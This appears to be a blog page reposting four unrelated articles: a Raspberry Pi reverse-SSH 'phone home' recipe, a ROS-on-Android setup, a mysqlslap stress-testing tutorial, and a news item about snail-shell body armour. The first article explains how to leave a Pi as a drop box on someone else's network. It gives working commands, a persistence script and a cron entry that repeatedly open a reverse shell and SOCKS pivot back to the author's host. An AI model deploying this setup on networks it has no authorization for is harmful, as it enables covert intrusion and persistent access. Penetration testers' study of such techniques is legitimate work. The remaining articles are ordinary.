Reverse SSH Shell – Raspberry Pi Recipes

Standard

From: http://www.irongeek.com/i.php?page=security%2Fraspberry-pi-recipes&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+IrongeeksSecuritySite+%28Irongeek%27s+Security+Site%29#SSH_Phone_Home:_Using_the_Raspberry_Pi_as_a_proxy/pivot_(Shovel_a_Shell)


SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

        In  this section I’ll cover setting up a Raspberry Pi to send you a Reverse Shell using SSH (AKA: Shovel a shell). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else’s network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, but most distros I’ve seen do.

  • These are the non-automated commands to do a reverse SSH connection and set up a Proxy/Pivot using OpenSSH:
    On Raspberry Pi use the following command :

        ssh -R 1974:localhost:22 root@some-pc-client

  • On PC (must have SSH server on box):

        ssh -D 1080 -p 1974 pi@localhost

The above command also opens up a SOCKS port on you local PC host that you can use to tunnel traffic into the Raspberry Pis’s network with.

Automating it

    Ok, the commands above were just to do it manually, how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 min, so check out his site.:
http://www.brandonhutchinson.com/Passwordless_ssh_logins.html
http://www.brandonhutchinson.com/ssh_tunnelling.html

Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use home.irongeek.com in these examples)

        ssh-keygen -t rsa

Use a blank passphrase. This next line is to copy of the key to the PC

        cat ~/.ssh/id_rsa.pub | ssh root@home.irongeek.com “cat – >> ~/.ssh/authorized_keys” 

2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameters in green as needed:

#!/bin/sh

# Based on http://www.brandonhutchinson.com/ssh_tunnelling.html

# $REMOTE_HOST is the name of the remote system

REMOTE_HOST=home.irongeek.com

 

# Setting my username for home box, you will most likely want to change this

USER_NAME=root

 

# $REMOTE_PORT is the remote port number that will be used to tunnel

# back to this system

REMOTE_PORT=1974

 

# $COMMAND is the command used to create the reverse ssh tunnel

COMMAND=”ssh -q -N -R $REMOTE_PORT:localhost:22 $USER_NAME@$REMOTE_HOST”

 

# Is the tunnel up? Perform two tests:

 

# 1. Check for relevant process ($COMMAND)

pgrep -f -x “$COMMAND” > /dev/null 2>&1 || $COMMAND

 

# 2. Test tunnel by looking at “netstat” output on $REMOTE_HOST

ssh $REMOTE_HOST netstat -an | egrep “tcp.*:$REMOTE_PORT.*LISTEN” \

> /dev/null 2>&1

if [ $? -ne 0 ] ; then

pkill -f -x “$COMMAND”

$COMMAND

fi

 and set it as executable with:

                    chmod 755 autossh

3. Use the “crontab –e” command on your Raspberry Pi to schedule the script to run every 5 min. The entry will be something like:

        */5 * * * * /home/pi/autossh
SSH Automatic Script

4. Now go to you home PC and you should be able to use this command to connect to the waiting shell:

        ssh –D 1080 -p 1974 pi@localhost

Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.

 

1,034 total views, no views today

ROS on Android Phone | Finaly done with ROS(Robotic Operating System) on android

Standard

From: http://www.technolabsz.com/2012/03/ros-on-android-phone.html


ROS on Android Phone

 

Finaly done with ROS(Robotic Operating System) on android 

It was my 1 day work for getting an output from android to ROS Server .I will explain the procedure that i have done
Prerequisites:
1)android-sdk for linux -Refer the following site for manually download android component .Othervice you have to setup eclipse for doing it
2)platform-tools-This is the most required thing in this installation operation

Procedure:
1)Download android stack from ROS website
2)There is a README file in this stack describing the installation procedure .But there will some error when you follow it
Note :The error i got the installation operation is with adb
Starting of adb is like follows
#./adb kill-server
#./adb start-server
#./adb devices
It will print if the device is connected
#./adb shell
Set the Link path of python from README file
Change the link path according to your android path .Othervice it will show error
It is better to install Pythonforandroid and sl4a manually .
Set the adb path in .bashrc file on home folder
eg :export ADB=~/android-sdk/platform-tools/adb
After installation using make install command
You have to enter
$make cv_module
$make ros_sample 

After that you have to take pythonforandroid and press importmodule option
It will show cv.egg ,select and install it
Connect android phone and computer though a wifi network ,preferably through a router .
Take ros.py from sl4a script folder .Run it
It will ask for ROS_MASTER_URI ,for URI you have to note the IP of computer which running roscore .For eg:My system IP was 192.168.1.2 So theURI is

eg : ROS_MASTER_URI=http://192.168.1.2:11311
URI=http://IP:11311
Note:i have some issues in importing cv .So i commented the cvsection and working only on accelerometer ,vibrate ,speak functions
Here is the edited ros.py
#
#  ROS on Android
#  Sample ROS node
#
#  Copyright (c) 2011 Technische Universitaet Muenchen,
#  Distributed Multimodal Information Processing Group
#  http://vmi.lmt.ei.tum.de
#
#
from ros_android import *
import time
# load needed ROS packages
import roslib
import rospy
from std_msgs.msg import String
from std_msgs.msg import Int16
from sensor_msgs.msg import Image
#from cv_bridge import CvBridge, CvBridgeError
#import cv
# callback for /mobile/say
def cb_say(data):
rospy.loginfo(“I should say: %s”, data.data)
droid.makeToast(data.data)
droid.ttsSpeak(data.data)
# callback for /mobile/vibrate
def cb_vibrate(data):
droid.vibrate(data.data)
def main():
print “main()”
cam = CamHandler()
pub = rospy.Publisher(‘/mobile/acceleration’, String)
rospy.init_node(‘android’)
rospy.Subscriber(‘/mobile/say’, String, cb_say)
rospy.Subscriber(‘/mobile/vibrate’, Int16, cb_vibrate)
# start sensor polling in background
droid.startSensing()
while not rospy.is_shutdown():
# read the accelerometer and store result
acc = droid.sensorsReadAccelerometer().result
# if new sensor values have arrived, output them
if isinstance(acc[0], float):
# acc_str = “%s – Acc: %f %f %f” % (rospy.get_time(), acc[0], acc[1], acc[2])
acc_str = “X:%f Y:%f Z:%f” % (acc[0], acc[1], acc[2])
else:
# acc_str = “Time: %s – No acc. values” % rospy.get_time()
acc_str = “No values.”
rospy.loginfo(acc_str)
pub.publish(String(acc_str))
rospy.sleep(1.0)
# start-up main
main()
Here is the output
Videos

668 total views, no views today

Stress test MySQL with mysqlslap

Standard

From: http://www.techrepublic.com/blog/howdoi/how-do-i-stress-test-mysql-with-mysqlslap/133


How do I… Stress test MySQL with mysqlslap?
By Melonfire
September 17, 2007, 12:12 AM PDT
Takeaway: The mysqlslap utility makes it possible to benchmark and compare MySQL performance on different hardware, as well as accurately quantify the effect of a change in database design. This tutorial shows how you can use mysqlslap to run tests involving multiple clients, custom queries, different table engines, and much more.

One of the interesting new tools in MySQL 5.1.4 is mysqlslap, a load emulator that lets you see how well a particular query set or table engine performs under high-load conditions.

A query that consumes too many database resources may be the result of designing tables incorrectly, choosing the wrong table type, or creating an inefficient query. When a query eats up a lot of database resources, it can negatively affect other application components. By using mysqlslap to stress test a server in a non-public environment, you will discover these errors sooner, allowing you to you avoid a database meltdown once your application goes live.

This tutorial shows how you can use mysqlslap to run stress tests involving multiple clients, custom queries, different table engines, and much more.

Basic usage

This simple (and unrealistic) example uses mysqlslap to test server performance assuming only one client connection:

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql

Benchmark

Average number of seconds to run all queries: 0.006 seconds

Minimum number of seconds to run all queries: 0.006 seconds

Maximum number of seconds to run all queries: 0.006 seconds

Number of clients running queries: 1

Average number of queries per client: 0
The –auto-generate-sql switch tells mysqlslap to automatically generate and execute SQL statements, monitor how fast MySQL performs this task, and display the result. The results indicate that MySQL took 0.006 seconds to execute the SQL statements.

The –auto-generate-sql switch creates a table, executes an INSERT query and saves dummy data to it, executes a SELECT query to retrieve the dummy data, and then drops the table. You can see behind-the-scenes action by adding the -v switch to the mysqlslap command line (adding extra ‘v’s increases the verbosity level):

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql -vv

DROP SCHEMA IF EXISTS mysqlslap;

CREATE SCHEMA mysqlslap;

CREATE SCHEMA mysqlslap;

CREATE TABLE t1 (intcol1 INT(32),charcol1 VARCHAR(128));

INSERT INTO t1 VALUES (1804289383,’mxvtvmC9127qJNm06sGB8R92q2j7vTiiITRDGXM9ZLzkd

ekbWtmXKwZ2qG1llkRw5m9DHOFilEREk3q7oce8O3BEJC0woJsm6uzFAEynLH2xCsw1KQ1lT4zg9rdxB

L’);

SELECT intcol1,charcol1 FROM t1;

Benchmark

Average number of seconds to run all queries: 0.007 seconds

Minimum number of seconds to run all queries: 0.007 seconds

Maximum number of seconds to run all queries: 0.007 seconds

Number of clients running queries: 1

Average number of queries per client: 0 DROP SCHEMA IF EXISTS mysqlslap;
It’s unlikely that you’ll have only a single client connecting to the MySQL server at any given time, so you’ll typically also need the –concurrency switch, which lets you simulate multiple simultaneous client connections, like this:

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100

Benchmark

Average number of seconds to run all queries: 0.698 seconds

Minimum number of seconds to run all queries: 0.698 seconds

Maximum number of seconds to run all queries: 0.698 seconds

Number of clients running queries: 100

Average number of queries per client: 0
MySQL performance drops pretty significantly (from 0.007 seconds to 0.698 seconds) when it has to deal with 100 clients instead of just one.

See what happens if you increase the number of concurrent connections even more:

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=300

Benchmark

Average number of seconds to run all queries: 47.515 seconds

Minimum number of seconds to run all queries: 47.515 seconds

Maximum number of seconds to run all queries: 47.515 seconds

Number of clients running queries: 300

Average number of queries per client: 0
Note: As you increase the number of concurrent connections, you might encounter a “Too many connections” error. You need to adjust MySQL’s ‘max_connections’ variable, which controls the maximum number of concurrent connections allowed by the server.

Running tests more than once

You can force mysqlslap to run a particular test more than once by adding the –iterations switch to the command line. This example runs the same test five times and prints a composite result:

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –iterations=5

Benchmark

Average number of seconds to run all queries: 0.714 seconds

Minimum number of seconds to run all queries: 0.682 seconds

Maximum number of seconds to run all queries: 0.753 seconds

Number of clients running queries: 100

Average number of queries per client: 0
Specifying the total number of queries

It’s possible to force each “client” to run a specific number of queries by adding the –number-of-queries switch to the mysqlslap command line. When mysqlslap encounters this switch, it divides the corresponding value by the number of concurrent connections and uses the result to decide how many queries each client should run.

For example, with settings of 500 total queries and five concurrent clients, mysqlslap will run 500/5 = 100 queries per client. Take a look at an example:

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –number-of-queries=10000

Benchmark

Average number of seconds to run all queries: 0.694 seconds

Minimum number of seconds to run all queries: 0.694 seconds

Maximum number of seconds to run all queries: 0.694 seconds

Number of clients running queries: 100

Average number of queries per client: 100
Using larger tables

The default behavior of mysqlslap when using the –auto-generate-sql switch is to create a two-column table with one integer column and one character column. If this isn’t representative of the kind of tables you typically use, you can adjust these settings to include more integer and/or character columns, with the –number-char-cols and –number-int-cols switches. Here are examples:

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –number-of-queries=1000 –number-char-cols=4 –number-int-cols=7

Benchmark

Average number of seconds to run all queries: 1.290 seconds

Minimum number of seconds to run all queries: 1.290 seconds

Maximum number of seconds to run all queries: 1.290 seconds

Number of clients running queries: 100

Average number of queries per client: 10 shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –number-char-cols=4

Benchmark

Average number of seconds to run all queries: 0.968 seconds

Minimum number of seconds to run all queries: 0.968 seconds

Maximum number of seconds to run all queries: 0.968 seconds

Number of clients running queries: 100

Average number of queries per client: 0

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –number-int-cols=5

Benchmark

Average number of seconds to run all queries: 1.076 seconds

Minimum number of seconds to run all queries: 1.076 seconds

Maximum number of seconds to run all queries: 1.076 seconds

Number of clients running queries: 100

Average number of queries per client: 0
Using custom queries

While the –auto-generate-sql option is fine for general load testing, you may want to test the performance of a specific query on a database that already exists. In these situations, you can bypass the –auto-generate-sql switch and instead tell mysqlslap to use your own custom query with the –query switch. Here’s the next example:

shell> /usr/local/mysql/bin/mysqlslap –user=john –create-schema=world –query=”SELECT City.Name, City.District FROM City, Country WHERE City.CountryCode = Country.Code AND Country.Code = ‘IND’;” –concurrency=100 –iterations=5

Benchmark

Average number of seconds to run all queries: 2.886 seconds

Minimum number of seconds to run all queries: 2.137 seconds

Maximum number of seconds to run all queries: 4.125 seconds

Number of clients running queries: 100

Average number of queries per client: 1
It’s helpful to use mysqlslap in this manner when you need to analyze the effect of a change in your database structure or indexing because it allows you to immediately grasp the impact of, say, an additional index on overall performance. To illustrate, look what happens to the time needed to run the previous query when an index is added to the City table:

mysql> CREATE INDEX idx_ccode ON City(CountryCode);

Query OK, 4079 rows affected (1.06 sec)

Records: 4079 Duplicates: 0 Warnings: 0 mysql> exit

Bye

shell> /usr/local/mysql/bin/mysqlslap –user=john –create-schema=world –query=”SELECT City.Name, City.District FROM City, Country WHERE City.CountryCode = Country.Code AND Country.Code = ‘IND’;” –concurrency=100 –iterations=5

Benchmark

Average number of seconds to run all queries: 1.682 seconds

Minimum number of seconds to run all queries: 1.396 seconds

Maximum number of seconds to run all queries: 2.109 seconds

Number of clients running queries: 100

Average number of queries per client: 1
You can tell mysqlslap to create a custom table for your load testing by using the –create command-line switch with a CREATE TABLE command.

Comparing table engines

A cool feature of mysqlslap is the ability to specify the table engine used in the test. This provides database designers with an easy way to compare the performance of different table types under different load conditions. The –engine switch accepts any of MySQL’s supported table types and creates test tables using the corresponding storage engine. Here’s an example of how it could be used:

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –number-of-queries=700 –engine=innodb

Benchmark

Running for engine innodb

Average number of seconds to run all queries: 1.240 seconds

Minimum number of seconds to run all queries: 1.240 seconds

Maximum number of seconds to run all queries: 1.240 seconds

Number of clients running queries: 100

Average number of queries per client: 7 shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –number-of-queries=700 –engine=myisam

Benchmark

Running for engine myisam

Average number of seconds to run all queries: 0.676 seconds

Minimum number of seconds to run all queries: 0.676 seconds

Maximum number of seconds to run all queries: 0.676 seconds

Number of clients running queries: 100

Average number of queries per client: 7

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –number-of-queries=700 –engine=memory

Benchmark

Running for engine memory

Average number of seconds to run all queries: 0.602 seconds

Minimum number of seconds to run all queries: 0.602 seconds

Maximum number of seconds to run all queries: 0.602 seconds

Number of clients running queries: 100

Average number of queries per client: 7
Saving reports

You might wish to save a mysqlslap report so you can compare it to a previous or future test run; you may also want to use the report as a reference when you’re configuring new systems.

The easiest way to save a mysqlslap report is to pipe the output of a mysqlslap run to a file, as below:

shell> /usr/local/mysql/bin/mysqlslap –user=john –auto-generate-sql –concurrency=100 –number-of-queries=1000 –number-char-cols=4 –number-int-cols=7 >> /tmp/output.log
You can force mysqlslap to generate reports in CSV format; this is often useful if you need to import the data into a spreadsheet or database to build graphical reports from it. To do this, add the –csv switch to your mysqlslap command line and specify the output filename as an argument to this switch. Here’s an example:

shell> /usr/local/mysql/bin/mysqlslap –csv=/tmp/output.csv –user=john –auto-generate-sql –concurrency=100 –number-of-queries=1000 –number-char-cols=4 –number-int-cols=7
Here’s what the CSV file would contain if you peeked inside it:

shell> cat /tmp/output.csv

,query,1.070,1.070,1.070,100,10
Trying mysqlslap

The mysqlslap utility makes it possible to benchmark and compare MySQL performance on different hardware, as well as accurately quantify the effect of a change in database design. Try mysqlslap out for yourself and see how well your database server behaves under pressure from thousands of client connections.

657 total views, no views today

Next Stab Proof Vests Could Be Inspired By Ocean Snails’ Shells [Nature]

Standard

This bad-boy-in-a-shell could be used as inspiration for body armor, according to scientists. Meet the Crysomallon Squamiferum, or ‘scaly-foot gastropod.’ He could end up saving your life.

Hailing from the Central Indian Ridge, the snails can ward off attacks from crabs and other menaces thanks to what its hard shell is composed of. Inside hydrothermal vents iron sulphide particles are found, and combined with a spongy middle layer it means that when something strikes it—like a mean crab’s claw—it absorbs energy by allowing the shell to crack, or “microcrack” as the scientists at the Massachusetts Institute of Technology are calling it.

The shells also offer a form of attack, as well as defense. In a small way, at least. The iron sulphide will apparently make any attacking claws blunt, by grinding them down.

Whether we’ll see it on the next stab-proof vests is anyone’s guess, but at least we now know to avoid these scaly-foot gastropods. I’m certainly not going to eat any when I’m next in France, anyway. [New Scientist]






609 total views, no views today